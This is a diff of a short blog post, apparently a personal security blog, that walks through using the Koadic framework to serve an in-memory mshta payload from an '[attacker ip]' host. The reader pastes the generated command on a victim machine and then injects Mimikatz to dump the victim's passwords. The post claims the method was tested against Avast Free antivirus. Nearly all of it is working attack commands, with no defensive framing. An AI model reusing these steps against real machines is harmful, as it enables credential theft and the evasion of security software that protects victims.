spiritedwolf/fareedfauzi.github.io/_posts/2020-02-26-Inject-Mimikatz-mshta.md

 Watch video tutorial here: [Video](https://raw.githubusercontent.com/fareedfauzi/fareedfauzi.github.io/master/assets/videos/mimikatz%20with%20koadic.mp4)

+We are using js/mshta module as it will serves payloads in memory using MSHTA.exe HTML Applications for us.
+This poc is test on Avast Free AV and koadic managed to dump the password using Mimikatz implant.

+Run koadic and create our payload:

     ./koadic
     use stager/js/mshta
     set srvhost [attacker ip]
     run

-Copy the command line and paste on victim machine
+Copy the command line and paste on victim machine.

+Run mimikatz_dotnet2js:

     use implant/inject/mimikatz_dotnet2js
     set zombie 0
     run

-You can see, we can dump the password using this mimikatz module.
+As you can see, we can dump victim's password using this mimikatz module.

 ![enter image description here](https://raw.githubusercontent.com/fareedfauzi/fareedfauzi.github.io/master/assets/images/mimikatz_koadic.PNG)